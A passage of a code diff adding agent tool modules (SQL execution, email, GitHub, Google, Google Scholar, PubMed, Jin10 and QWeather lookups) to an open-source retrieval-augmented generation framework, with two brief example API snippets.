            self.set_output("_ERROR", str(last_e))
            return False

        assert False, self.output()

    def thoughts(self) -> str:
        inputs = self.get_input()
        return """
To: {}
Subject: {}
Your email is on its way—sit tight!
""".format(inputs.get("to_email", "-_-!"), inputs.get("subject", "-_-!"))
agent/tools/exesql.py (new file, 132 lines)
@@ -0,0 +1,132 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import os
from abc import ABC
import pandas as pd
import pymysql
import psycopg2
import pyodbc
from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
from api.utils.api_utils import timeout


class ExeSQLParam(ToolParamBase):
    """
    Define the ExeSQL component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "execute_sql",
            "description": "This is a tool that can execute SQL.",
            "parameters": {
                "sql": {
                    "type": "string",
                    "description": "The SQL to be executed.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.db_type = "mysql"
        self.database = ""
        self.username = ""
        self.host = ""
        self.port = 3306
        self.password = ""
        self.max_records = 1024

    def check(self):
        self.check_valid_value(self.db_type, "Choose DB type", ['mysql', 'postgresql', 'mariadb', 'mssql'])
        self.check_empty(self.database, "Database name")
        self.check_empty(self.username, "database username")
        self.check_empty(self.host, "IP Address")
        self.check_positive_integer(self.port, "IP Port")
        self.check_empty(self.password, "Database password")
        self.check_positive_integer(self.max_records, "Maximum number of records")
        if self.database == "rag_flow":
            if self.host == "ragflow-mysql":
                raise ValueError("For security reasons, accessing the built-in rag_flow database is not supported.")
            if self.password == "infini_rag_flow":
                raise ValueError("For security reasons, accessing the rag_flow database with the default password is not supported.")

    def get_input_form(self) -> dict[str, dict]:
        return {
            "sql": {
                "name": "SQL",
                "type": "line"
            }
        }


class ExeSQL(ToolBase, ABC):
    component_name = "ExeSQL"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 60))
    def _invoke(self, **kwargs):
        sql = kwargs.get("sql")
        if not sql:
            raise Exception("SQL for `ExeSQL` MUST not be empty.")
        sqls = sql.split(";")

        if self._param.db_type in ["mysql", "mariadb"]:
            db = pymysql.connect(db=self._param.database, user=self._param.username, host=self._param.host,
                                 port=self._param.port, password=self._param.password)
        elif self._param.db_type == 'postgresql':
            db = psycopg2.connect(dbname=self._param.database, user=self._param.username, host=self._param.host,
                                  port=self._param.port, password=self._param.password)
        elif self._param.db_type == 'mssql':
            conn_str = (
                r'DRIVER={ODBC Driver 17 for SQL Server};'
                r'SERVER=' + self._param.host + ',' + str(self._param.port) + ';'
                r'DATABASE=' + self._param.database + ';'
                r'UID=' + self._param.username + ';'
                r'PWD=' + self._param.password
            )
            db = pyodbc.connect(conn_str)
        try:
            cursor = db.cursor()
        except Exception as e:
            raise Exception("Database Connection Failed! \n" + str(e))

        sql_res = []
        formalized_content = []
        for single_sql in sqls:
            single_sql = single_sql.replace('```', '')
            if not single_sql:
                continue

            cursor.execute(single_sql)
            if cursor.rowcount == 0:
                sql_res.append({"content": "No record in the database!"})
                break
            if self._param.db_type == 'mssql':
                single_res = pd.DataFrame.from_records(cursor.fetchmany(self._param.max_records),
                                                       columns=[desc[0] for desc in cursor.description])
            else:
                single_res = pd.DataFrame([i for i in cursor.fetchmany(self._param.max_records)])
                single_res.columns = [i[0] for i in cursor.description]

            sql_res.append(single_res.to_dict(orient='records'))
            formalized_content.append(single_res.to_markdown(index=False, floatfmt=".6f"))

        self.set_output("json", sql_res)
        self.set_output("formalized_content", "\n\n".join(formalized_content))
        return self.output("formalized_content")

    def thoughts(self) -> str:
        return "Query sent—waiting for the data."
agent/tools/github.py (new file, 91 lines)
@@ -0,0 +1,91 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import logging
import os
import time
from abc import ABC
import requests
from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
from api.utils.api_utils import timeout


class GitHubParam(ToolParamBase):
    """
    Define the GitHub component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "github_search",
            "description": """GitHub repository search is a feature that enables users to find specific repositories on the GitHub platform. This search functionality allows users to locate projects, codebases, and other content hosted on GitHub based on various criteria.""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with GitHub. The keywords should be the most important words/terms (including synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 10

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }


class GitHub(ToolBase, ABC):
    component_name = "GitHub"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""

        last_e = ""
        for _ in range(self._param.max_retries + 1):
            try:
                url = 'https://api.github.com/search/repositories?q=' + kwargs["query"] + '&sort=stars&order=desc&per_page=' + str(
                    self._param.top_n)
                headers = {"Content-Type": "application/vnd.github+json", "X-GitHub-Api-Version": '2022-11-28'}
                response = requests.get(url=url, headers=headers).json()
                self._retrieve_chunks(response['items'],
                                      get_title=lambda r: r["name"],
                                      get_url=lambda r: r["html_url"],
                                      get_content=lambda r: str(r["description"]) + '\n stars:' + str(r['watchers']))
                self.set_output("json", response['items'])
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"GitHub error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"GitHub error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return "Scanning GitHub repos related to `{}`.".format(self.get_input().get("query", "-_-!"))
agent/tools/google.py (new file, 159 lines)
@@ -0,0 +1,159 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import logging
import os
import time
from abc import ABC
from serpapi import GoogleSearch
from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
from api.utils.api_utils import timeout


class GoogleParam(ToolParamBase):
    """
    Define the Google component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "google_search",
            "description": """Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking ...""",
            "parameters": {
                "q": {
                    "type": "string",
                    "description": "The search keywords to execute with Google. The keywords should be the most important words/terms (including synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                },
                "start": {
                    "type": "integer",
                    "description": "Parameter defines the result offset. It skips the given number of results and is used for pagination (e.g., 0 (default) is the first page of results, 10 is the 2nd page, 20 is the 3rd page, etc.). Google Local Results only accepts multiples of 20 (e.g. 20 for the second page of results, 40 for the third, etc.) as the `start` value.",
                    "default": "0",
                    "required": False,
                },
                "num": {
                    "type": "integer",
                    "description": "Parameter defines the maximum number of results to return (e.g., 10 (default) returns 10 results, 40 returns 40, and 100 returns 100). Using num may introduce latency and/or prevent the inclusion of specialized result types. It is better to omit this parameter unless it is strictly necessary to increase the number of results per page. Results are not guaranteed to match the number specified in num.",
                    "default": "6",
                    "required": False,
                }
            }
        }
        super().__init__()
        self.start = 0
        self.num = 6
        self.api_key = ""
        self.country = "cn"
        self.language = "en"

    def check(self):
        self.check_empty(self.api_key, "SerpApi API key")
        self.check_valid_value(self.country, "Google Country",
                               ['af', 'al', 'dz', 'as', 'ad', 'ao', 'ai', 'aq', 'ag', 'ar', 'am', 'aw', 'au', 'at',
                                'az', 'bs', 'bh', 'bd', 'bb', 'by', 'be', 'bz', 'bj', 'bm', 'bt', 'bo', 'ba', 'bw',
                                'bv', 'br', 'io', 'bn', 'bg', 'bf', 'bi', 'kh', 'cm', 'ca', 'cv', 'ky', 'cf', 'td',
                                'cl', 'cn', 'cx', 'cc', 'co', 'km', 'cg', 'cd', 'ck', 'cr', 'ci', 'hr', 'cu', 'cy',
                                'cz', 'dk', 'dj', 'dm', 'do', 'ec', 'eg', 'sv', 'gq', 'er', 'ee', 'et', 'fk', 'fo',
                                'fj', 'fi', 'fr', 'gf', 'pf', 'tf', 'ga', 'gm', 'ge', 'de', 'gh', 'gi', 'gr', 'gl',
                                'gd', 'gp', 'gu', 'gt', 'gn', 'gw', 'gy', 'ht', 'hm', 'va', 'hn', 'hk', 'hu', 'is',
                                'in', 'id', 'ir', 'iq', 'ie', 'il', 'it', 'jm', 'jp', 'jo', 'kz', 'ke', 'ki', 'kp',
                                'kr', 'kw', 'kg', 'la', 'lv', 'lb', 'ls', 'lr', 'ly', 'li', 'lt', 'lu', 'mo', 'mk',
                                'mg', 'mw', 'my', 'mv', 'ml', 'mt', 'mh', 'mq', 'mr', 'mu', 'yt', 'mx', 'fm', 'md',
                                'mc', 'mn', 'ms', 'ma', 'mz', 'mm', 'na', 'nr', 'np', 'nl', 'an', 'nc', 'nz', 'ni',
                                'ne', 'ng', 'nu', 'nf', 'mp', 'no', 'om', 'pk', 'pw', 'ps', 'pa', 'pg', 'py', 'pe',
                                'ph', 'pn', 'pl', 'pt', 'pr', 'qa', 're', 'ro', 'ru', 'rw', 'sh', 'kn', 'lc', 'pm',
                                'vc', 'ws', 'sm', 'st', 'sa', 'sn', 'rs', 'sc', 'sl', 'sg', 'sk', 'si', 'sb', 'so',
                                'za', 'gs', 'es', 'lk', 'sd', 'sr', 'sj', 'sz', 'se', 'ch', 'sy', 'tw', 'tj', 'tz',
                                'th', 'tl', 'tg', 'tk', 'to', 'tt', 'tn', 'tr', 'tm', 'tc', 'tv', 'ug', 'ua', 'ae',
                                'uk', 'gb', 'us', 'um', 'uy', 'uz', 'vu', 've', 'vn', 'vg', 'vi', 'wf', 'eh', 'ye',
                                'zm', 'zw'])
        self.check_valid_value(self.language, "Google languages",
                               ['af', 'ak', 'sq', 'ws', 'am', 'ar', 'hy', 'az', 'eu', 'be', 'bem', 'bn', 'bh',
                                'xx-bork', 'bs', 'br', 'bg', 'bt', 'km', 'ca', 'chr', 'ny', 'zh-cn', 'zh-tw', 'co',
                                'hr', 'cs', 'da', 'nl', 'xx-elmer', 'en', 'eo', 'et', 'ee', 'fo', 'tl', 'fi', 'fr',
                                'fy', 'gaa', 'gl', 'ka', 'de', 'el', 'kl', 'gn', 'gu', 'xx-hacker', 'ht', 'ha', 'haw',
                                'iw', 'hi', 'hu', 'is', 'ig', 'id', 'ia', 'ga', 'it', 'ja', 'jw', 'kn', 'kk', 'rw',
                                'rn', 'xx-klingon', 'kg', 'ko', 'kri', 'ku', 'ckb', 'ky', 'lo', 'la', 'lv', 'ln', 'lt',
                                'loz', 'lg', 'ach', 'mk', 'mg', 'ms', 'ml', 'mt', 'mv', 'mi', 'mr', 'mfe', 'mo', 'mn',
                                'sr-me', 'my', 'ne', 'pcm', 'nso', 'no', 'nn', 'oc', 'or', 'om', 'ps', 'fa',
                                'xx-pirate', 'pl', 'pt', 'pt-br', 'pt-pt', 'pa', 'qu', 'ro', 'rm', 'nyn', 'ru', 'gd',
                                'sr', 'sh', 'st', 'tn', 'crs', 'sn', 'sd', 'si', 'sk', 'sl', 'so', 'es', 'es-419', 'su',
                                'sw', 'sv', 'tg', 'ta', 'tt', 'te', 'th', 'ti', 'to', 'lua', 'tum', 'tr', 'tk', 'tw',
                                'ug', 'uk', 'ur', 'uz', 'vu', 'vi', 'cy', 'wo', 'xh', 'yi', 'yo', 'zu']
                               )

    def get_input_form(self) -> dict[str, dict]:
        return {
            "q": {
                "name": "Query",
                "type": "line"
            },
            "start": {
                "name": "From",
                "type": "integer",
                "value": 0
            },
            "num": {
                "name": "Limit",
                "type": "integer",
                "value": 12
            }
        }


class Google(ToolBase, ABC):
    component_name = "Google"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("q"):
            self.set_output("formalized_content", "")
            return ""

        params = {
            "api_key": self._param.api_key,
            "engine": "google",
            "q": kwargs["q"],
            "google_domain": "google.com",
            "gl": self._param.country,
            "hl": self._param.language
        }
        last_e = ""
        for _ in range(self._param.max_retries + 1):
            try:
                search = GoogleSearch(params).get_dict()
                self._retrieve_chunks(search["organic_results"],
                                      get_title=lambda r: r["title"],
                                      get_url=lambda r: r["link"],
                                      get_content=lambda r: r.get("about_this_result", {}).get("source", {}).get("description", r["snippet"])
                                      )
                self.set_output("json", search["organic_results"])
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"Google error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Google error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return """
Keywords: {}
Looking for the most relevant articles.
""".format(self.get_input().get("query", "-_-!"))
agent/tools/googlescholar.py (new file, 96 lines)
@@ -0,0 +1,96 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import logging
import os
import time
from abc import ABC
from scholarly import scholarly
from agent.tools.base import ToolMeta, ToolParamBase, ToolBase
from api.utils.api_utils import timeout


class GoogleScholarParam(ToolParamBase):
    """
    Define the GoogleScholar component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "google_scholar_search",
            "description": """Google Scholar provides a simple way to broadly search for scholarly literature. From one place, you can search across many disciplines and sources: articles, theses, books, abstracts and court opinions, from academic publishers, professional societies, online repositories, universities and other web sites. Google Scholar helps you find relevant work across the world of scholarly research.""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with Google Scholar. The keywords should be the most important words/terms (including synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 12
        self.sort_by = 'relevance'
        self.year_low = None
        self.year_high = None
        self.patents = True

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.sort_by, "GoogleScholar Sort_by", ['date', 'relevance'])
        self.check_boolean(self.patents, "Whether or not to include patents, defaults to True")

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }


class GoogleScholar(ToolBase, ABC):
    component_name = "GoogleScholar"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""

        last_e = ""
        for _ in range(self._param.max_retries + 1):
            try:
                scholar_client = scholarly.search_pubs(kwargs["query"], patents=self._param.patents, year_low=self._param.year_low,
                                                       year_high=self._param.year_high, sort_by=self._param.sort_by)
                self._retrieve_chunks(scholar_client,
                                      get_title=lambda r: r['bib']['title'],
                                      get_url=lambda r: r["pub_url"],
                                      get_content=lambda r: "\n author: " + ",".join(r['bib']['author']) + '\n Abstract: ' + r['bib'].get('abstract', 'no abstract')
                                      )
                self.set_output("json", list(scholar_client))
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"GoogleScholar error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"GoogleScholar error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return "Looking for scholarly papers on `{}`, prioritising reputable sources.".format(self.get_input().get("query", "-_-!"))
agent/tools/jin10.py (new file, 130 lines)
@@ -0,0 +1,130 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import json
from abc import ABC
import pandas as pd
import requests
from agent.component.base import ComponentBase, ComponentParamBase


class Jin10Param(ComponentParamBase):
    """
    Define the Jin10 component parameters.
    """

    def __init__(self):
        super().__init__()
        self.type = "flash"
        self.secret_key = "xxx"
        self.flash_type = '1'
        self.calendar_type = 'cj'
        self.calendar_datatype = 'data'
        self.symbols_type = 'GOODS'
        self.symbols_datatype = 'symbols'
        self.contain = ""
        self.filter = ""

    def check(self):
        self.check_valid_value(self.type, "Type", ['flash', 'calendar', 'symbols', 'news'])
        self.check_valid_value(self.flash_type, "Flash Type", ['1', '2', '3', '4', '5'])
        self.check_valid_value(self.calendar_type, "Calendar Type", ['cj', 'qh', 'hk', 'us'])
        self.check_valid_value(self.calendar_datatype, "Calendar DataType", ['data', 'event', 'holiday'])
        self.check_valid_value(self.symbols_type, "Symbols Type", ['GOODS', 'FOREX', 'FUTURE', 'CRYPTO'])
        self.check_valid_value(self.symbols_datatype, 'Symbols DataType', ['symbols', 'quotes'])


class Jin10(ComponentBase, ABC):
    component_name = "Jin10"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Jin10.be_output("")

        jin10_res = []
        headers = {'secret-key': self._param.secret_key}
        try:
            if self._param.type == "flash":
                params = {
                    'category': self._param.flash_type,
                    'contain': self._param.contain,
                    'filter': self._param.filter
                }
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/flash?category=' + self._param.flash_type,
                    headers=headers, data=json.dumps(params))
                response = response.json()
                for i in response['data']:
                    jin10_res.append({"content": i['data']['content']})
            if self._param.type == "calendar":
                params = {
                    'category': self._param.calendar_type
                }
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/calendar/' + self._param.calendar_datatype + '?category=' + self._param.calendar_type,
                    headers=headers, data=json.dumps(params))

                response = response.json()
                jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
            if self._param.type == "symbols":
                params = {
                    'type': self._param.symbols_type
                }
                if self._param.symbols_datatype == "quotes":
                    params['codes'] = 'BTCUSD'
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/' + self._param.symbols_datatype + '?type=' + self._param.symbols_type,
                    headers=headers, data=json.dumps(params))
                response = response.json()
                if self._param.symbols_datatype == "symbols":
                    for i in response['data']:
                        i['Commodity Code'] = i['c']
                        i['Stock Exchange'] = i['e']
                        i['Commodity Name'] = i['n']
                        i['Commodity Type'] = i['t']
                        del i['c'], i['e'], i['n'], i['t']
                if self._param.symbols_datatype == "quotes":
                    for i in response['data']:
                        i['Selling Price'] = i['a']
                        i['Buying Price'] = i['b']
                        i['Commodity Code'] = i['c']
                        i['Stock Exchange'] = i['e']
                        i['Highest Price'] = i['h']
                        i['Yesterday’s Closing Price'] = i['hc']
                        i['Lowest Price'] = i['l']
                        i['Opening Price'] = i['o']
                        i['Latest Price'] = i['p']
                        i['Market Quote Time'] = i['t']
                        del i['a'], i['b'], i['c'], i['e'], i['h'], i['hc'], i['l'], i['o'], i['p'], i['t']
                jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
            if self._param.type == "news":
                params = {
                    'contain': self._param.contain,
                    'filter': self._param.filter
                }
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/news',
                    headers=headers, data=json.dumps(params))
                response = response.json()
                jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
        except Exception as e:
            return Jin10.be_output("**ERROR**: " + str(e))

        if not jin10_res:
            return Jin10.be_output("")

        return pd.DataFrame(jin10_res)
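
A hedged sketch of the flash-news call the component issues. Note the component sends its params as a JSON request body on a GET; the query-string form below is the more conventional reading of the same endpoint (the secret key is a placeholder):

import requests

headers = {"secret-key": "YOUR_JIN10_KEY"}  # placeholder credential
resp = requests.get(
    "https://open-data-api.jin10.com/data-api/flash",
    params={"category": "1"},
    headers=headers,
    timeout=10,
)
for item in resp.json().get("data", []):
    print(item["data"]["content"])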
agent/tools/pubmed.py (new file, 108 lines)
@@ -0,0 +1,108 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import logging
import os
import time
from abc import ABC
from Bio import Entrez
import re
import xml.etree.ElementTree as ET
from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
from api.utils.api_utils import timeout


class PubMedParam(ToolParamBase):
    """
    Define the PubMed component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "pubmed_search",
            "description": """
PubMed is an openly accessible, free database which includes primarily the MEDLINE database of references and abstracts on life sciences and biomedical topics.
In addition to MEDLINE, PubMed provides access to:
- older references from the print version of Index Medicus, back to 1951 and earlier
- references to some journals before they were indexed in Index Medicus and MEDLINE, for instance Science, BMJ, and Annals of Surgery
- very recent entries to records for an article before it is indexed with Medical Subject Headings (MeSH) and added to MEDLINE
- a collection of books available full-text and other subsets of NLM records
- PMC citations
- NCBI Bookshelf
""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with PubMed. The keywords should be the most important words/terms (including synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 12
        self.email = "A.N.Other@example.com"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }


class PubMed(ToolBase, ABC):
    component_name = "PubMed"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""

        last_e = ""
        for _ in range(self._param.max_retries + 1):
            try:
                Entrez.email = self._param.email
                pubmedids = Entrez.read(Entrez.esearch(db='pubmed', retmax=self._param.top_n, term=kwargs["query"]))['IdList']
                pubmedcnt = ET.fromstring(re.sub(r'<(/?)b>|<(/?)i>', '', Entrez.efetch(db='pubmed', id=",".join(pubmedids),
                                                                                       retmode="xml").read().decode("utf-8")))
                self._retrieve_chunks(pubmedcnt.findall("PubmedArticle"),
                                      get_title=lambda child: child.find("MedlineCitation").find("Article").find("ArticleTitle").text,
                                      get_url=lambda child: "https://pubmed.ncbi.nlm.nih.gov/" + child.find("MedlineCitation").find("PMID").text,
                                      get_content=lambda child: child.find("MedlineCitation")
                                          .find("Article")
                                          .find("Abstract")
                                          .find("AbstractText").text
                                          if child.find("MedlineCitation")
                                          .find("Article").find("Abstract")
                                          else "No abstract available")
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"PubMed error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"PubMed error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return "Looking for scholarly papers on `{}`, prioritising reputable sources.".format(self.get_input().get("query", "-_-!"))
agent/tools/qweather.py (new file, 111 lines)
@@ -0,0 +1,111 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from abc import ABC
import pandas as pd
import requests
from agent.component.base import ComponentBase, ComponentParamBase


class QWeatherParam(ComponentParamBase):
    """
    Define the QWeather component parameters.
    """

    def __init__(self):
        super().__init__()
        self.web_apikey = "xxx"
        self.lang = "zh"
        self.type = "weather"
        self.user_type = 'free'
        self.error_code = {
            "204": "The request was successful, but the region you are querying does not have the data you need at this time.",
            "400": "Request error; the request may contain incorrect parameters or be missing mandatory parameters.",
            "401": "Authentication failed: possibly a wrong KEY, a wrong digital signature, or the wrong type of KEY (e.g. using an SDK KEY to access the Web API).",
            "402": "Exceeded the number of accesses, or the balance is insufficient to continue using the service. You can recharge, upgrade your plan, or wait for the quota to reset.",
            "403": "No access. The bound PackageName, BundleID, or domain/IP address may be inconsistent, or the data requires additional payment.",
            "404": "The queried data or region does not exist.",
            "429": "Exceeded the QPM limit (number of accesses per minute); please refer to the QPM description.",
            "500": "No response or timeout; the interface service is abnormal, please contact us."
        }
        # Weather
        self.time_period = 'now'

    def check(self):
        self.check_empty(self.web_apikey, "QWeather API key")
        self.check_valid_value(self.type, "Type", ["weather", "indices", "airquality"])
        self.check_valid_value(self.user_type, "Free subscription or paid subscription", ["free", "paid"])
        self.check_valid_value(self.lang, "Use language",
                               ['zh', 'zh-hant', 'en', 'de', 'es', 'fr', 'it', 'ja', 'ko', 'ru', 'hi', 'th', 'ar', 'pt',
                                'bn', 'ms', 'nl', 'el', 'la', 'sv', 'id', 'pl', 'tr', 'cs', 'et', 'vi', 'fil', 'fi',
                                'he', 'is', 'nb'])
        self.check_valid_value(self.time_period, "Time period", ['now', '3d', '7d', '10d', '15d', '30d'])


class QWeather(ComponentBase, ABC):
    component_name = "QWeather"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = "".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return QWeather.be_output("")

        try:
            response = requests.get(
                url="https://geoapi.qweather.com/v2/city/lookup?location=" + ans + "&key=" + self._param.web_apikey).json()
            if response["code"] == "200":
                location_id = response["location"][0]["id"]
            else:
                return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])

            base_url = "https://api.qweather.com/v7/" if self._param.user_type == 'paid' else "https://devapi.qweather.com/v7/"

            if self._param.type == "weather":
                url = base_url + "weather/" + self._param.time_period + "?location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
                response = requests.get(url=url).json()
                if response["code"] == "200":
                    if self._param.time_period == "now":
                        return QWeather.be_output(str(response["now"]))
                    else:
                        qweather_res = [{"content": str(i) + "\n"} for i in response["daily"]]
                        if not qweather_res:
                            return QWeather.be_output("")

                        df = pd.DataFrame(qweather_res)
                        return df
                else:
                    return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])

            elif self._param.type == "indices":
                url = base_url + "indices/1d?type=0&location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
                response = requests.get(url=url).json()
                if response["code"] == "200":
                    indices_res = response["daily"][0]["date"] + "\n" + "\n".join(
                        [i["name"] + ": " + i["category"] + ", " + i["text"] for i in response["daily"]])
                    return QWeather.be_output(indices_res)

                else:
                    return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])

            elif self._param.type == "airquality":
                url = base_url + "air/now?location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
                response = requests.get(url=url).json()
                if response["code"] == "200":
                    return QWeather.be_output(str(response["now"]))
                else:
                    return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
        except Exception as e:
            return QWeather.be_output("**Error**" + str(e))
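
The component's control flow is two chained GETs: a geo lookup that resolves a city name to a location id, then the weather endpoint keyed by that id. A minimal sketch against the free-tier host (the key is a placeholder):

import requests

KEY = "YOUR_QWEATHER_KEY"  # placeholder credential
geo = requests.get(
    "https://geoapi.qweather.com/v2/city/lookup",
    params={"location": "Beijing", "key": KEY},
    timeout=10,
).json()
location_id = geo["location"][0]["id"]

now = requests.get(
    "https://devapi.qweather.com/v7/weather/now",  # devapi is the free-tier host
    params={"location": location_id, "key": KEY, "lang": "en"},
    timeout=10,
).json()
print(now["now"]["temp"], now["now"]["text"])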
agent/tools/retrieval.py (new file, 167 lines)
@@ -0,0 +1,167 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import os
import re
from abc import ABC
